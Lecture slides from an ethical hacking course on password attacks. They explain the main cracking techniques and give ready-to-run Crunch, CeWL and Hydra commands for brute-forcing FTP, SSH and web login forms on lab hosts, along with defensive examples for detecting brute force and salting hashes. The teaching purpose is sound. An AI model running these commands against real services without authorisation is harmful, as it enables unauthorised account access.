En-Ethical Hacking Module 2 1.5

The document provides an overview of password cracking, detailing various techniques such as brute force, dictionary, rainbow table, phishing, and hybrid attacks. It explains how passwords are stored in Unix and Windows systems, the use of wordlists for cracking, and tools like Crunch and CeWL for generating custom wordlists. Additionally, it introduces Hydra as a versatile password cracking tool and discusses hash functions and their security implications.

Uploaded by: npanwar0a0

Ethical Hacking & Testing
Unit 2: Ethical Hacking
Password Attacks

By:
Dr. Sumitra
What is Password Cracking?

Password cracking is the process of using an application program to identify an unknown or forgotten password that allows access to a computer or network resource. It is often used to:
- Test the strength of passwords and systems.
- Recover lost or forgotten passwords.
- Gain unauthorized access to systems (maliciously).
How Passwords are Stored

- Unix Password File - It stores the hashed value of passwords in the password file instead of the actual passwords. Hashed passwords were originally stored in the publicly accessible file /etc/passwd (modern systems keep them in /etc/shadow, which is readable only by root).

- Windows Password File - The password file for Windows, known as the Security Accounts Manager (SAM) file, is located in: C:\windows\system32\config\sam
Techniques of Password Cracking

1. Brute Force Attack

How it works: The attacker tries every possible combination of characters until the correct password is found.

Example: For a 4-digit PIN, the attacker tries 0000, 0001, 0002, ..., up to 9999.

Strengths: Guaranteed to work given enough time.

Weaknesses: Extremely time-consuming and resource-intensive for long or complex passwords.
Techniques of Password Cracking

2. Dictionary Attack

How it works: The attacker uses a pre-defined list of words (a dictionary) to guess passwords.

Example: Trying common passwords like "password", "123456" or "admin".

Strengths: Faster than brute force if the password is a common word.

Weaknesses: Fails if the password is not in the dictionary.

Use Case: Cracking weak or commonly used


Techniques of Password Cracking

3. Rainbow Table Attack

How it works: The attacker uses precomputed tables of hash values (rainbow tables) to reverse hashed passwords.

Example: If a password hash matches a hash in the rainbow table, the plaintext password is revealed.

Strengths: Extremely fast for cracking unsalted hashes.

Weaknesses: Requires large storage for rainbow tables; ineffective against salted hashes.
Techniques of Password Cracking

4. Phishing

How it works: The attacker tricks the user into revealing their password through fake websites or emails.

Example: A fake login page mimicking a bank or social media site.

Strengths: Does not require technical cracking skills.

Weaknesses: Relies on human error.

Use Case: Stealing credentials from unsuspecting


Techniques of Password Cracking

5. Hybrid Attack

How it works: Combines dictionary and brute force attacks by adding numbers or symbols to dictionary words.

Example: Trying "password1", "password2", etc.

Strengths: More effective than pure dictionary attacks.

Weaknesses: Still limited by the dictionary used.

Use Case: Cracking moderately complex passwords.
What are Wordlists?

- A wordlist is a file (a text file in most cases, but not limited to it) that contains a set of values that the attacker needs to supply in order to test a mechanism.

- Location of wordlists in Kali:

cd /usr/share/wordlists

- The dirb directory holds the wordlists used by the dirb tool to perform directory brute force.
Wordlist
Wordlists

drwxr-xr-x is a Linux file permission that means everyone can read a directory, but only the owner can change its contents.
The first character of the permission code, d, indicates that it is a directory.
The next three characters, rwx, represent the owner's permissions.
The following three characters, r-x, represent the group's permissions.
The last three characters, r-x, represent the permissions for others.

d    rwx       rwx       r-x
     Owner     Group     Others
     Read      Read      Read
     Write     Write     Execute
     Execute   Execute

(d = directory)
Wordlist

-    rw-       rw-       r--
     Owner     Group     Others
     Read      Read      Read
     Write     Write

(- = regular file)

How we can change the ownership:

chown <new user> <directory name or file name>

chown sumi pass.txt


Wordlist

chmod (change mode):

r = 4, w = 2, x = 1

- rw- rw- r--  ->  6 6 4   (owner 4+2, group 4+2, others 4)
d rwx rwx r-x  ->  7 7 5   (owner 4+2+1, group 4+2+1, others 4+1)

chmod 775 pass.txt
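The r=4, w=2, x=1 mapping above, worked through in code. This is an added example written for this page, not code from the slides: it converts between the symbolic form shown by ls -l and the octal form chmod takes, then applies a mode to a scratch file and reads it back with os.stat, which is the check to run after changing the mode of a shared wordlist.

```python
import os
import stat
import tempfile

# Weights of the three permission bits, as on the slide: r=4, w=2, x=1.
BIT_VALUES = {"r": 4, "w": 2, "x": 1}


def symbolic_to_octal(perm):
    """Turn a symbolic permission string such as 'rwxrwxr-x' (or the
    10-character ls -l form 'drwxrwxr-x') into the octal string '775'."""
    if len(perm) == 10:          # drop the file-type character ('d' or '-')
        perm = perm[1:]
    if len(perm) != 9:
        raise ValueError("expected 9 permission characters, got %r" % perm)
    digits = []
    for who in range(3):         # owner, group, others
        triplet = perm[who * 3: who * 3 + 3]
        value = 0
        for ch, expected in zip(triplet, "rwx"):
            if ch == expected:
                value += BIT_VALUES[ch]
            elif ch != "-":
                raise ValueError("unexpected character %r in %r" % (ch, perm))
        digits.append(str(value))
    return "".join(digits)


def octal_to_symbolic(octal):
    """Inverse mapping: '664' -> 'rw-rw-r--'."""
    out = []
    for d in octal:
        value = int(d)
        out.append("r" if value & 4 else "-")
        out.append("w" if value & 2 else "-")
        out.append("x" if value & 1 else "-")
    return "".join(out)


def apply_and_verify(octal):
    """Create a scratch file, chmod it to the given mode and read the mode
    back with os.stat, returning the symbolic form the kernel reports."""
    fd, path = tempfile.mkstemp()   # constructed scratch file, removed below
    os.close(fd)
    try:
        os.chmod(path, int(octal, 8))
        mode = os.stat(path).st_mode
        return stat.filemode(mode)[1:]   # strip the leading type character
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(symbolic_to_octal("drwxrwxr-x"), octal_to_symbolic("664"))
    print(apply_and_verify("775"))
```

Only the nine rwx bits are handled; setuid, setgid and sticky bits are outside the slide's scope and are rejected as unexpected characters.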


Wordlist

fern-wifi: a directory of wordlists used to attack Wi-Fi authentication.

rockyou.txt: It is very large, with 1,44,42,062 (i.e. 14,442,062) values that could be passwords for a lot of user accounts on the internet.
Crafting Wordlists

- Crunch
- CeWL

- Crunch: Crunch is a tool developed in C by bofh28 that can create custom, highly modifiable wordlists. It takes a min size, a max size and alphanumeric character sets as input, generates every possible combination of words, with or without meaning, and writes them out to a text file.
Crunch

/usr/share/crunch

Commands to generate the custom text file of passwords:

crunch 1 3 -o dict.txt

Alphanumeric Characters: A user can also define the selected characters to be used while generating a wordlist. Here, words of min size 5 and max size 7 characters are generated using the characters "p, a, s, s, 1, 2 and 3" as input.

crunch 5 7 pass123 -o dict.txt
Crunch

Using codename character sets: These codenames can be used while creating dictionary files. For example, to create a wordlist of 4 characters per word using a mixture of alphabets, numeric and special characters, one can specify the charset.lst file using the "-f" option and then the code word "mixalpha-numeric-all":

crunch 4 4 -f charset.lst mixalpha-numeric-all -o dict.txt
Crunch

Startblock in wordlists: A startblock can be defined using the "-s" option. With it we define from where a wordlist should start generating:

crunch 4 4 -f charset.lst mixalpha-numeric-all -o dict.txt -s abc1

Creating a dictionary with various patterns (the "-t" option):
@ will insert lower case characters.
, will insert upper case characters.
% will insert numbers.
^ will insert symbols.

Crunch requires the min and max lengths to equal the length of the pattern, so these commands generate 7- and 3-character words respectively:

crunch 7 7 -t sumi%%% -o dict.txt
crunch 3 3 -t @%^ -o dict.txt
Crunch

crunch 3 3 abc + 123 -t @%^ -o pattern.txt

The above command creates a dictionary with a lowercase letter as the first character, a number as the second and a symbol as the third, but using only "a, b or c" as letters, "1, 2 or 3" as numbers and any symbol from crunch's default set in the last position. The "+" placeholder keeps crunch's default character set for that class (the sets are given in the order lowercase, uppercase, numbers, symbols).

crunch 4 4 + + 123 + -t %%@^ -o pattern2.txt
Crunch

crunch 7 7 -t p@ss,%^ > dict.txt
crunch 7 7 -t p@ss,%^ -l a@aaaaa > 1.txt

- Treating symbols as literals: When "-l" is used together with the "-t" option, it tells crunch which symbols should be treated as literals.
- For example, we know that @ is used to denote a lowercase letter. So, if we want to generate a 7-character-per-word wordlist with the word "p@ss" fixed, crunch will consider @ as a pattern indicator for lowercase alphabets.
- Thereafter, the -l option can be used to define which character is to be treated as a literal and not converted into a pattern.
Crunch

Inverting Wordlist: using the "-i" option crunch will fix the last letter first and make combinations out of the first letters.

crunch 5 5 abc12 -t @@@%% -o dict.txt
crunch 5 5 abc12 -t @@@%% -i -o invert.txt

Limit duplicate patterns: Using the "-d" option limits the duplicates (here, at most 2 consecutive identical lowercase characters):

crunch 5 5 abc + 123 -t @@@%^ -o 1.txt
crunch 5 5 abc + 123 -t @@@%^ -o 2.txt -d 2@
Crunch

- Splitting wordlist based on size: To split a file based on size we can use the "-b" option. For example, to split a wordlist into multiple files of at most 1 MB each:

crunch 4 7 Pass123 -b 1mb -o START

- Note that this only works with "-o START", which will autoname the files in the format.

Compressing wordlist:

crunch 4 7 Pass123 -z gzip -o START
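The -t placeholders (@ , % ^), the per-class character lists, the -l literal mask, the -i inversion and the size question behind -b are all the same small algorithm: one character set per position, expanded as a cartesian product. The following is an added example written for this page, not code from crunch or from the slides; it reproduces that expansion in Python so that the size of a wordlist (and, with a guess rate, how long a policy holds up against it) can be estimated before any file is written. The symbol set and the reading of the -l mask (a non-'a' position marks a literal, as in the slide's a@aaaaa example) are assumptions of this example. The same counting also covers Hydra's -x min:max:charset option discussed later on this page.

```python
import itertools
import string

# Placeholder classes mirroring crunch's -t syntax as described on the slides:
#   @ = lowercase letter, , = uppercase letter, % = digit, ^ = symbol.
# The symbol list is an assumption for this example (crunch ships its own).
DEFAULT_CLASSES = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=",
}


def pattern_slots(pattern, classes=None, literal_mask=None):
    """Translate a crunch-style pattern into one character set per position.
    `classes` overrides the default sets (like giving crunch explicit lists,
    e.g. "abc" for @ and "123" for %). `literal_mask` mirrors -l: a mask of the
    same length whose non-'a' positions keep the pattern character literal
    (assumed reading of the slide's "-l a@aaaaa" example)."""
    classes = {**DEFAULT_CLASSES, **(classes or {})}
    if literal_mask is not None and len(literal_mask) != len(pattern):
        raise ValueError("literal mask must be as long as the pattern")
    slots = []
    for i, ch in enumerate(pattern):
        forced_literal = literal_mask is not None and literal_mask[i] != "a"
        if ch in classes and not forced_literal:
            slots.append(classes[ch])
        else:
            slots.append(ch)          # fixed character
    return slots


def count_candidates(pattern, classes=None, literal_mask=None):
    """Size of the wordlist the pattern expands to (product of slot sizes)."""
    total = 1
    for s in pattern_slots(pattern, classes, literal_mask):
        total *= len(s)
    return total


def expand(pattern, classes=None, literal_mask=None, invert=False):
    """Generate every candidate. Default order holds the leftmost position
    fixed longest; invert=True mirrors -i (leftmost position varies fastest)."""
    slots = pattern_slots(pattern, classes, literal_mask)
    if not invert:
        for combo in itertools.product(*slots):
            yield "".join(combo)
    else:
        for combo in itertools.product(*reversed(slots)):
            yield "".join(reversed(combo))


def hydra_x_count(min_len, max_len, charset_spec):
    """Size of Hydra's -x min:max:charset space: '1' adds digits, 'a' lowercase,
    'A' uppercase; any other character is added literally."""
    chars = set()
    for c in charset_spec:
        if c == "1":
            chars.update(string.digits)
        elif c == "a":
            chars.update(string.ascii_lowercase)
        elif c == "A":
            chars.update(string.ascii_uppercase)
        else:
            chars.add(c)
    n = len(chars)
    return sum(n ** length for length in range(min_len, max_len + 1))


def seconds_to_exhaust(candidates, guesses_per_second):
    """Worst-case time to try every candidate at a given guess rate."""
    return candidates / guesses_per_second


if __name__ == "__main__":
    # The 4-digit PIN from the brute force slide: 10^4 candidates.
    print(count_candidates("%%%%"))
    # crunch 5 5 abc12 -t @@@%% : 3^3 * 2^2 = 108 words, first "aaa11".
    print(count_candidates("@@@%%", {"@": "abc", "%": "12"}))
    print(next(expand("@@@%%", {"@": "abc", "%": "12"})))
    # crunch 7 7 -t p@ss,%^ -l a@aaaaa : the @ stays literal.
    print(count_candidates("p@ss,%^", literal_mask="a@aaaaa"))
```

Comparing count_candidates("p@ss,%^") with and without the literal mask shows the effect of -l directly: the masked version has 26 times fewer words because one position is fixed instead of ranging over the lowercase alphabet.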


CeWL

CeWL (Custom Word List generator) is a Ruby program that crawls a specific URL to a defined depth and returns a list of keywords, which password crackers like John the Ripper, Medusa and WFuzz can use to crack passwords.
CeWL

cewl http://www.vulnweb.com

Store this wordlist in a file:

cewl http://www.vulnweb.com -w dict.txt

Generating wordlists of a certain length: you can use the -m option to provide the minimum length for a keyword, so the wordlist only contains words of at least that length.

cewl http://vulnweb.com/ -m 10 -w dict.txt
CeWL

Retrieval of emails from the website: we can use the -e option, while the -n option will hide the word list created while crawling the provided website.

cewl http://www.vulnweb.com -e -n

To count the number of repeated words on the website:

cewl http://www.vulnweb.com -c
CeWL

Alphanumeric Wordlist: you may need an alphanumeric wordlist; use the --with-numbers option to get one.

cewl http://testphp.vulnweb.com --with-numbers

CeWL with Digest/Basic Authentication: it may happen that some web applications have an authentication page for login, and for those the basic command above will not give the desired results. For that you need to supply credentials for the authentication page, using the command given below.

cewl http://testphp.vulnweb.com/login.php --auth_type Digest --auth_user test --auth_pass test -v
CeWL

--auth_type: Digest / Basic
--auth_user: Authentication username
--auth_pass: Authentication password
Hydra (Password cracking tool)

- Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add.

- It supports: Cisco AAA, Cisco auth, Cisco enable, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, POP3, PostgreSQL, RDP, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Hydra

To guess the password for a specific username:

hydra -l msfadmin -P pass.txt 192.168.239.118 ftp

To guess the username for a specific password:

hydra -L users.txt -p msfadmin 192.168.239.118 ftp

Brute forcing username and password:

hydra -L users.txt -P pass.txt 192.168.239.118 ftp
Hydra

Verbose and Debug Mode:

The -V option is used for verbose mode, where it will show the login+pass combination for each attempt.

The -d option is used to enable debug mode. It shows the complete detail of the attack, with wait time, socket, PID and RECV.

hydra -L users.txt -P pass.txt 192.168.239.118 ftp -V
hydra -l admin -P pass.txt 192.168.239.118 ftp -d
Hydra

NULL / Same as Login / Reverse Login attempt:

Hydra has an option -e which will check 3 more passwords while brute-forcing: [n] for null, [s] for same, i.e. the same as the username, and [r] for reverse, i.e. the reverse of the username.

hydra -L users.txt -P pass.txt 192.168.239.118 ftp -V -e nsr

Saving output in a txt file:

hydra -L users.txt -P pass.txt 192.168.239.118 ftp -o result.txt
Hydra

To resume a brute force attack: an attack may get halted/paused accidentally due to some unexpected behaviour. Hydra therefore includes the -R option so that you can resume the attack from that position rather than starting from the beginning.

hydra -L users.txt -P pass.txt 192.168.239.118 ftp
hydra -R
Hydra

Password generation using various sets of characters:

To generate passwords using various sets of characters, you can use the -x option. It is used as -x min:max:charset, where:
Min: specifies the minimum number of characters in a password.
Max: specifies the maximum number of characters in a password.
Charset: the charset can contain 1 for numbers, a for lowercase and A for uppercase characters. Any other character which is added is put into the list.
Hydra

To attack a specific port rather than the default:

Network admins sometimes change the default port number of some services for security reasons. In the previous commands hydra was brute forcing the ftp service by just mentioning the service name rather than the port; when the default port has been changed, hydra's -s option lets you specify the port.

hydra -L users.txt -P pass.txt 192.168.239.118 ssh -s 2222
Hydra

Attacking Multiple Hosts: if there are multiple hosts, you can use -M, with which the brute force runs against multiple hosts.

hydra -L users.txt -P pass.txt -M hosts.txt ftp

The -F option makes the attack exit after the first found login/password pair for any host.

hydra -L users.txt -P pass.txt -M hosts.txt ftp -F
Hydra

HTTP Login Form Brute Force:

The hydra http-post-form module can be used to carry out a brute force attack on simple web-based login forms that require username and password variables, either by GET or POST request.

hydra -l msfadmin -P pass.txt 192.168.55.118 http-post-form '/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed'
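The slides show the attacking side of Hydra; what the same activity looks like to the target is a burst of failed logins from one source, often across many usernames (-L) and followed by a success if a pair from the lists is valid. The following detector is an added example written for this page, not part of the slides or of Hydra. The log lines are constructed in OpenSSH's auth.log format (the addresses are documentation ranges, not real hosts) and the window and threshold values are assumptions to tune per environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines in OpenSSH auth.log format; not taken from any real host.
SAMPLE_LOG = """\
Mar  3 10:00:01 host sshd[2201]: Failed password for invalid user admin from 192.0.2.10 port 50111 ssh2
Mar  3 10:00:01 host sshd[2202]: Failed password for invalid user root from 192.0.2.10 port 50112 ssh2
Mar  3 10:00:02 host sshd[2203]: Failed password for msfadmin from 192.0.2.10 port 50113 ssh2
Mar  3 10:00:02 host sshd[2204]: Failed password for invalid user test from 192.0.2.10 port 50114 ssh2
Mar  3 10:00:03 host sshd[2205]: Failed password for invalid user guest from 192.0.2.10 port 50115 ssh2
Mar  3 10:00:03 host sshd[2206]: Failed password for msfadmin from 192.0.2.10 port 50116 ssh2
Mar  3 10:00:04 host sshd[2207]: Accepted password for msfadmin from 192.0.2.10 port 50117 ssh2
Mar  3 10:05:00 host sshd[2301]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Mar  3 10:07:30 host sshd[2302]: Accepted password for alice from 198.51.100.7 port 40002 ssh2
"""

LOGIN_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)


def parse(line, year=2024):
    """Return (timestamp, result, user, ip) for a password login line, else None.
    syslog timestamps carry no year, so one is assumed for the example."""
    m = LOGIN_RE.match(line)
    if not m:
        return None
    ts_text = " ".join(m["ts"].split())      # collapse the padded day field
    ts = datetime.strptime(f"{year} {ts_text}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(log_text, window_seconds=60, threshold=5):
    """Flag a source IP once it reaches `threshold` failed logins within a
    sliding window of `window_seconds`. The alert records how many distinct
    usernames were tried (a -L style run sprays many) and whether a success
    from the same source followed the burst."""
    recent = defaultdict(deque)      # ip -> timestamps of recent failures
    users = defaultdict(set)         # ip -> usernames seen in failures
    alerts = {}
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, ip = rec
        if result == "Failed":
            q = recent[ip]
            q.append(ts)
            users[ip].add(user)
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and ip not in alerts:
                alerts[ip] = {
                    "first_alert_at": ts,
                    "failures": len(q),
                    "distinct_users": len(users[ip]),
                    "success_after": False,
                }
        elif result == "Accepted" and ip in alerts:
            alerts[ip]["success_after"] = True   # guessed pair was accepted
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

With the defaults, 192.0.2.10 is flagged on its fifth failure within a few seconds, with five distinct usernames and a later accepted login, while the single mistyped password from 198.51.100.7 never reaches the threshold. The same structure applies to vsftpd or web-server logs once the parse function is swapped for their line format.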
Hash

- The goal of a hash function is to ensure the integrity of the data.

- A hash function accepts a variable-length block of data as input and produces a fixed-size hash value h = H(M).
Hash

Hash Function   Output Size          Security   Use case
MD5             128 bit (32 hex)     Broken     Checksum
SHA-1           160 bit (40 hex)     Broken     Legacy applications
SHA-256         256 bit (64 hex)     Secure     Digital signature, blockchain
SHA-384         384 bit (96 hex)     Secure     Cryptography application
SHA-512         512 bit (128 hex)    Secure     Cryptography application
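The table above and the rainbow table slide earlier fit together in one short piece of code: the fixed output size h = H(M) is what makes a precomputed table possible, and a per-user salt is what defeats it. This is an added example written for this page, not code from the slides; it checks the hex lengths in the table, builds a tiny lookup table of unsalted MD5 hashes for a handful of constructed common passwords, and then shows the defender's counterpart, salted PBKDF2-HMAC-SHA256 with a constant-time comparison. The password list and the iteration count are assumptions of the example.

```python
import hashlib
import hmac
import os

# Output sizes from the slide's table, in hex characters.
HEX_LENGTHS = {"md5": 32, "sha1": 40, "sha256": 64, "sha384": 96, "sha512": 128}


def hex_digest(algorithm, message):
    """h = H(M) as a hex string for any of the algorithms in the table."""
    return hashlib.new(algorithm, message.encode()).hexdigest()


def check_output_sizes():
    """Confirm the digest length is fixed regardless of input length."""
    results = {}
    for alg, expected in HEX_LENGTHS.items():
        short = hex_digest(alg, "a")
        long_ = hex_digest(alg, "a" * 10000)
        results[alg] = len(short) == expected and len(long_) == expected
    return results


# A constructed mini lookup table: unsalted MD5 hash -> plaintext. A real
# rainbow table is a space-optimised form of the same idea.
COMMON_PASSWORDS = ["password", "123456", "admin", "letmein", "qwerty"]
UNSALTED_TABLE = {hex_digest("md5", p): p for p in COMMON_PASSWORDS}


def lookup_unsalted(stored_md5):
    """Reverse an unsalted hash by table lookup; None if not precomputed."""
    return UNSALTED_TABLE.get(stored_md5)


# Defender side: salted, iterated hashing. Iteration count is an assumption.
PBKDF2_ITERATIONS = 100_000


def store_password(password, salt=None):
    """Return (salt, digest) for storage, with a fresh random salt per user."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


def verify_password(password, salt, stored_digest):
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return hmac.compare_digest(candidate, stored_digest)


def distinct_salted_digests(password, trials=5):
    """Hash one password under `trials` random salts and count distinct digests.
    Each salt yields a different digest, so a single table entry per plaintext
    (the rainbow table assumption) no longer works."""
    return len({store_password(password)[1] for _ in range(trials)})


if __name__ == "__main__":
    print(check_output_sizes())
    print(lookup_unsalted(hex_digest("md5", "admin")))       # hit: "admin"
    salt, digest = store_password("admin")
    print(verify_password("admin", salt, digest))           # True
    print(distinct_salted_digests("admin"))                 # 5
```

The unsalted lookup succeeds instantly because there is exactly one MD5 digest per plaintext; with a 16-byte salt the attacker would need a separate table for each of 2^128 salt values, which is the "ineffective against salted hashes" weakness from the rainbow table slide.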
How to take Meterpreter
session
Step 1 Take normal shell of target machine
How to crack password

- Crunch and CeWL to generate the password list
- Crunch: generates a custom list (permutations and combinations) for brute force (meaningless words), between a minimum and a maximum length
- Hydra (best graphical and user interface)
